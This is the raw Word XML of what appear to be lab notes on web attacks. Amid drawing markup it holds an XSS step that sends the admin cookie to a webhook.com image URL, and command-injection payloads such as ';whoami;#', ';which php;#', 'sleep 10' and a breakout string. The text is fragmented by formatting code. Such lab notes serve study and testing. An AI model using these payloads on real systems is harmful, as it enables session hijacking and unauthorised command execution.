      </w:pPr>
      <w:r>
        <w:t>XXS 0x03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EDE4A8" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="321" w:lineRule="auto"/>
        <w:ind w:left="765" w:hanging="615"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34ABE8E1" wp14:editId="4211D7DB">
                <wp:extent cx="285750" cy="361950"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3918" name="Group 3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361950"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="36195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8" style="width:22.5pt;height:28.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="2857,3619">
                <v:shape id="Shape 350" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m23813,0c26970,0,30008,605,32925,1808c35843,3017,38418,4738,40651,6970c42883,9203,44604,11776,45812,14691c47021,17611,47625,20653,47625,23813c47625,26966,47021,30001,45812,32919c44604,35833,42883,38410,40651,40649c38418,42875,35843,44596,32925,45805c30008,47014,26970,47619,23813,47625c20655,47619,17617,47014,14700,45805c11783,44596,9207,42875,6975,40649c4742,38410,3021,35833,1813,32919c604,30001,0,26966,0,23813c0,20653,604,17611,1813,14691c3021,11776,4742,9203,6975,6970c9207,4738,11783,3017,14700,1808c17617,605,20655,0,23813,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 351" style="position:absolute;width:476;height:476;left:2381;top:3143;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30007,45812,32922c44604,35840,42883,38416,40650,40649c38418,42875,35842,44596,32925,45811c30008,47014,26970,47619,23813,47625c20655,47619,17617,47014,14700,45811c11783,44596,9207,42875,6975,40649c4742,38416,3021,35840,1813,32922c604,30007,0,26969,0,23813c0,20650,604,17611,1813,14697c3021,11776,4742,9199,6975,6970c9207,4738,11783,3017,14700,1808c17617,605,20655,0,23813,0c26970,0,30008,605,32925,1808c35842,3017,38418,4738,40650,6970c42883,9199,44604,11776,45812,14697c47021,17611,47625,20650,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use webhook.com to get a image utl and pass it in the comments session we will be able ot get the adin cookie..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F69EA02" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="309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4192B76A" wp14:editId="34932298">
                <wp:extent cx="6581774" cy="114300"/>
                <wp:effectExtent l="0" t="0" r="0" b="0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14300"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="114300"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6229" name="Shape 6229"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="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0" name="Shape 6230"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="952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4" style="width:518.25pt;height:9pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,1143">
                <v:shape id="Shape 6231" style="position:absolute;width:65817;height:190;left:0;top:0;" coordsize="6581774,19050" path="m0,0l6581774,0l6581774,19050l0,19050l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#dddddd"/>
                </v:shape>
                <v:shape id="Shape 6232" style="position:absolute;width:65817;height:190;left:0;top:952;" coordsize="6581774,19050" path="m0,0l6581774,0l6581774,19050l0,19050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0D431490" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>5.Command line injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617896E0" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="31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0BA2E6D5" wp14:editId="037E230B">
                <wp:extent cx="6581774" cy="9525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3902" name="Group 3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6233" name="Shape 6233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2" style="width:518.25pt;height:0.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,95">
                <v:shape id="Shape 6234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6A4102EA" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Command Injection 0x01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B19A84B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913102D" wp14:editId="0B604426">
                <wp:extent cx="6581774" cy="847725"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3903" name="Group 3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847725"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="847725"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6235" name="Shape 6235"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="82867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" name="Rectangle 3842"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="485775" y="276985"/>
                            <a:ext cx="211272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FDBFB" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="155BDA"/>
                                  <w:w w:val="94"/>
                                  <w:u w:val="single" w:color="155BDA"/>
                                </w:rPr>
                                <w:t>htt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9" name="Rectangle 3849"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="644626" y="276985"/>
                            <a:ext cx="961253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93F2" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="155BDA"/>
                                  <w:w w:val="105"/>
                                  <w:u w:val="single" w:color="155BDA"/>
                                </w:rPr>
                                <w:t>p://localhos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8" name="Rectangle 3848"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1367372" y="276985"/>
                            <a:ext cx="52795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8E39D" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                              <w:hyperlink r:id="rId20">
                                <w:r>
                                  <w:rPr>
                                    <w:color w:val="155BDA"/>
                                    <w:w w:val="84"/>
                                    <w:u w:val="single" w:color="155BDA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407170" y="276985"/>
                            <a:ext cx="52795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73E8" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                              <w:hyperlink r:id="rId21">
                                <w:r>
                                  <w:rPr>
                                    <w:color w:val="32373F"/>
                                    <w:w w:val="105"/>
                                  </w:rPr>
                                  <w:t>;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446865" y="276985"/>
                            <a:ext cx="971645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FB90F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000"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whoami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;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33337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85775" y="562728"/>
                            <a:ext cx="1225319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D7486" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="107"/>
                                </w:rPr>
                                <w:t>;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which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php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;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3102D" id="Group 3903" o:spid="_x0000_s1160" style="width:518.25pt;height:66.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817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">
                <v:shape id="Shape 6235" o:spid="_x0000_s1161" style="position:absolute;top:8286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356" o:spid="_x0000_s1162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" path="m23813,v3157,,6195,598,9112,1805c35843,3014,38418,4735,40651,6970v2232,2229,3953,4806,5161,7721c47021,17608,47625,20650,47625,23813v,3153,-604,6188,-1813,9106c44604,35833,42883,38410,40651,40649v-2233,2232,-4808,3953,-7726,5162c30008,47014,26970,47619,23813,47625v-3158,-6,-6196,-611,-9113,-1814c11783,44602,9207,42881,6975,40649,4742,38410,3021,35833,1813,32919,604,30001,,26966,,23813,,20650,604,17608,1813,14691,3021,11776,4742,9199,6975,6970,9207,4735,11783,3014,14700,1805,17617,598,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 357" o:spid="_x0000_s1163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" path="m47625,23813v,3156,-604,6188,-1813,9106c44604,35833,42883,38410,40650,40642v-2232,2230,-4808,3951,-7725,5163c30008,47014,26970,47619,23813,47625v-3158,-6,-6196,-611,-9113,-1820c11783,44593,9207,42872,6975,40642,4742,38410,3021,35833,1813,32919,604,30001,,26969,,23813,,20650,604,17608,1813,14691,3021,11776,4742,9199,6975,6970,9207,4738,11783,3017,14700,1808,17617,605,20655,,23813,v3157,,6195,605,9112,1808c35842,3017,38418,4738,40650,6970v2233,2229,3954,4806,5162,7721c47021,17608,47625,20650,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 3842" o:spid="_x0000_s1164" style="position:absolute;left:4857;top:2769;width:211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c+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B/D3PsYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="31CFDBFB" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="155BDA"/>
                            <w:w w:val="94"/>
                            <w:u w:val="single" w:color="155BDA"/>
                          </w:rPr>
                          <w:t>htt</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3849" o:spid="_x0000_s1165" style="position:absolute;left:6446;top:2769;width:961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  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="6EB593F2" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="155BDA"/>
                            <w:w w:val="105"/>
                            <w:u w:val="single" w:color="155BDA"/>
                          </w:rPr>
                          <w:t>p://localhos</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3848" o:spid="_x0000_s1166" style="position:absolute;left:13673;top:2769;width:52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  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="7168E39D" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                        <w:hyperlink r:id="rId22">
                          <w:r>
                            <w:rPr>
                              <w:color w:val="155BDA"/>
                              <w:w w:val="84"/>
                              <w:u w:val="single" w:color="155BDA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396" o:spid="_x0000_s1167" style="position:absolute;left:14071;top:2769;width:52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394273E8" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                        <w:hyperlink r:id="rId23">
                          <w:r>
                            <w:rPr>
                              <w:color w:val="32373F"/>
                              <w:w w:val="105"/>
                            </w:rPr>
                            <w:t>;</w:t>
                          </w:r>
                        </w:hyperlink>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 397" o:spid="_x0000_s1168" style="position:absolute;left:14468;top:2769;width:971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5F2FB90F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000"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whoami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;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#</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 364" o:spid="_x0000_s1169" style="position:absolute;left:3333;top:600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" path="m47625,23813v,3156,-604,6194,-1813,9109c44604,35840,42883,38416,40650,40649v-2232,2226,-4808,3947,-7725,5156c30008,47014,26970,47619,23813,47625v-3158,-6,-6196,-611,-9113,-1820c11783,44596,9207,42875,6975,40649,4742,38416,3021,35840,1813,32922,604,30007,,26969,,23813,,20650,604,17611,1813,14697,3021,11779,4742,9203,6975,6970,9207,4735,11783,3014,14700,1808,17617,605,20655,,23813,v3157,,6195,605,9112,1808c35842,3014,38418,4735,40650,6970v2233,2233,3954,4809,5162,7727c47021,17611,47625,20650,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 365" o:spid="_x0000_s1170" style="position:absolute;left:4857;top:5627;width:1225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2FFD7486" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="107"/>
                          </w:rPr>
                          <w:t>;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which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php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;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#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5A248F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Command Injection 0x01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57393739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07232952" wp14:editId="6AF4D526">
                <wp:extent cx="6581774" cy="838200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3914" name="Group 3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838200"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="838200"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6279" name="Shape 6279"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="8191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485775" y="276985"/>
                            <a:ext cx="211272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F64F2" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="155BDA"/>
                                  <w:w w:val="94"/>
                                  <w:u w:val="single" w:color="155BDA"/>
                                </w:rPr>
                                <w:t>htt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9" name="Rectangle 3859"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="644626" y="276985"/>
                            <a:ext cx="1225412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0B81C" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="155BDA"/>
                                  <w:w w:val="105"/>
                                  <w:u w:val="single" w:color="155BDA"/>
                                </w:rPr>
                                <w:t>p://localhost?q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" name="Rectangle 3866"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1565988" y="276985"/>
                            <a:ext cx="495843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F77B" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="155BDA"/>
                                  <w:w w:val="113"/>
                                  <w:u w:val="single" w:color="155BDA"/>
                                </w:rPr>
                                <w:t>='slee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5" name="Rectangle 3865"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1938802" y="276985"/>
                            <a:ext cx="105682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AF544" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                              <w:hyperlink r:id="rId24">
                                <w:r>
                                  <w:rPr>
                                    <w:color w:val="155BDA"/>
                                    <w:w w:val="107"/>
                                    <w:u w:val="single" w:color="155BDA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018407" y="276985"/>
                            <a:ext cx="52795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83840" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                              <w:hyperlink r:id="rId25">
                                <w:r>
                                  <w:rPr>
                                    <w:color w:val="32373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2058102" y="276985"/>
                            <a:ext cx="211364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4D3A" w14:textId="77777777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2217023" y="276985"/>
                            <a:ext cx="36279" cy="17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17CA5" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="89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Shape 384"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="33337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85775" y="562728"/>
                            <a:ext cx="1049677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1342F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="107"/>
                                </w:rPr>
                                <w:t>?q='whoami'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32952" id="Group 3914" o:spid="_x0000_s1171" style="width:518.25pt;height:66pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817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">
                <v:shape id="Shape 6279" o:spid="_x0000_s1172" style="position:absolute;top:8191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367" o:spid="_x0000_s1173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" path="m23813,v3157,,6195,605,9112,1808c35843,3017,38418,4738,40651,6970v2232,2229,3953,4806,5161,7721c47021,17608,47625,20650,47625,23813v,3153,-604,6188,-1813,9106c44604,35833,42883,38410,40651,40649v-2233,2232,-4808,3953,-7726,5156c30008,47014,26970,47619,23813,47625v-3158,-6,-6196,-611,-9113,-1820c11783,44602,9207,42881,6975,40649,4742,38410,3021,35833,1813,32919,604,30001,,26966,,23813,,20650,604,17608,1813,14691,3021,11776,4742,9199,6975,6970,9207,4738,11783,3017,14700,1808,17617,605,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 368" o:spid="_x0000_s1174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" path="m47625,23813v,3153,-604,6188,-1813,9106c44604,35833,42883,38410,40650,40642v-2232,2233,-4808,3954,-7725,5163c30008,47020,26970,47625,23813,47625v-3158,,-6196,-605,-9113,-1820c11783,44596,9207,42875,6975,40642,4742,38410,3021,35833,1813,32919,604,30001,,26966,,23813,,20653,604,17611,1813,14697,3021,11776,4742,9199,6975,6970,9207,4735,11783,3014,14700,1808,17617,605,20655,,23813,v3157,,6195,605,9112,1808c35842,3014,38418,4735,40650,6970v2233,2229,3954,4806,5162,7727c47021,17611,47625,20653,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 3856" o:spid="_x0000_s1175" style="position:absolute;left:4857;top:2769;width:211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  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="327F64F2" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="155BDA"/>
                            <w:w w:val="94"/>
                            <w:u w:val="single" w:color="155BDA"/>
                          </w:rPr>
                          <w:t>htt</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3859" o:spid="_x0000_s1176" style="position:absolute;left:6446;top:2769;width:1225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S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jI3zksYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="1400B81C" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="155BDA"/>
                            <w:w w:val="105"/>
                            <w:u w:val="single" w:color="155BDA"/>
                          </w:rPr>
                          <w:t>p://localhost?q</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3866" o:spid="_x0000_s1177" style="position:absolute;left:15659;top:2769;width:495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1d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MEviGP7fhCcgl38AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAM36tXcYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="76FCF77B" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="155BDA"/>
                            <w:w w:val="113"/>
                            <w:u w:val="single" w:color="155BDA"/>
                          </w:rPr>
                          <w:t>='slee</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3865" o:spid="_x0000_s1178" style="position:absolute;left:19388;top:2769;width:105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Mq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ow+4vQlPQM6uAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMOsMyrHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="186AF544" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                        <w:hyperlink r:id="rId26">
                          <w:r>
                            <w:rPr>
                              <w:color w:val="155BDA"/>
                              <w:w w:val="107"/>
                              <w:u w:val="single" w:color="155BDA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400" o:spid="_x0000_s1179" style="position:absolute;left:20184;top:2769;width:52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47683840" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                        <w:hyperlink r:id="rId27">
                          <w:r>
                            <w:rPr>
                              <w:color w:val="32373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806" o:spid="_x0000_s1180" style="position:absolute;left:20581;top:2769;width:211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  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="13934D3A" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="109"/>
                          </w:rPr>
                          <w:t>10</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3807" o:spid="_x0000_s1181" style="position:absolute;left:22170;top:2769;width:36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  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2FA17CA5" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="89"/>
                          </w:rPr>
                          <w:t>'</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 384" o:spid="_x0000_s1182" style="position:absolute;left:3333;top:600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" path="m47625,23813v,3156,-604,6194,-1813,9109c44604,35840,42883,38410,40650,40649v-2232,2232,-4808,3953,-7725,5156c30008,47020,26970,47625,23813,47625v-3158,,-6196,-605,-9113,-1820c11783,44602,9207,42881,6975,40649,4742,38410,3021,35840,1813,32922,604,30007,,26969,,23813,,20650,604,17608,1813,14691,3021,11776,4742,9203,6975,6970,9207,4735,11783,3014,14700,1808,17617,605,20655,,23813,v3157,,6195,605,9112,1808c35842,3014,38418,4735,40650,6970v2233,2233,3954,4806,5162,7721c47021,17608,47625,20650,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 385" o:spid="_x0000_s1183" style="position:absolute;left:4857;top:5627;width:1049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2D61342F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="107"/>
                          </w:rPr>
                          <w:t>?q='whoami'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08652B" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Command Injection 0x03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621DFCD5" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0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4DA21302" wp14:editId="5DC00579">
                <wp:extent cx="6581774" cy="933450"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3915" name="Group 3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33450"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="933450"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6301" name="Shape 6301"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="82867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2" name="Shape 6302"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="91440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3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85775" y="276978"/>
                            <a:ext cx="7309697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2FFC3" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="108"/>
                                </w:rPr>
                                <w:t>Based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test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result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inject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payload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last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position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where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input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is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received.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33337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3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85775" y="562728"/>
                            <a:ext cx="1665955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5E71F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="105"/>
                                </w:rPr>
                                <w:t>^2))}';whoami;)^2))}'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21302" id="Group 3915" o:spid="_x0000_s1184" style="width:518.25pt;height:73.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6581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">
                <v:shape id="Shape 6301" o:spid="_x0000_s1185" style="position:absolute;top:8286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6302" o:spid="_x0000_s1186" style="position:absolute;top:9144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387" o:spid="_x0000_s1187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" path="m23813,v3157,,6195,605,9112,1808c35843,3017,38418,4738,40651,6970v2232,2229,3953,4806,5161,7727c47021,17611,47625,20650,47625,23813v,3153,-604,6188,-1813,9109c44604,35840,42883,38410,40651,40649v-2233,2226,-4808,3947,-7726,5156c30008,47014,26970,47619,23813,47625v-3158,-6,-6196,-611,-9113,-1820c11783,44596,9207,42875,6975,40649,4742,38410,3021,35840,1813,32922,604,30001,,26966,,23813,,20650,604,17611,1813,14697,3021,11776,4742,9199,6975,6970,9207,4738,11783,3017,14700,1808,17617,605,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 388" o:spid="_x0000_s1188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" path="m47625,23813v,3153,-604,6188,-1813,9106c44604,35833,42883,38410,40650,40642v-2232,2233,-4808,3954,-7725,5160c30008,47014,26970,47619,23813,47625v-3158,-6,-6196,-611,-9113,-1823c11783,44596,9207,42875,6975,40642,4742,38410,3021,35833,1813,32919,604,30001,,26966,,23813,,20653,604,17611,1813,14697,3021,11776,4742,9199,6975,6970,9207,4735,11783,3014,14700,1805,17617,598,20655,,23813,v3157,,6195,598,9112,1805c35842,3014,38418,4735,40650,6970v2233,2229,3954,4806,5162,7727c47021,17611,47625,20653,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 389" o:spid="_x0000_s1189" style="position:absolute;left:4857;top:2769;width:7309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1422FFC3" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="108"/>
                          </w:rPr>
                          <w:t>Based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on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a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test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result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inject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payload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last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position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where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input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is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received.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
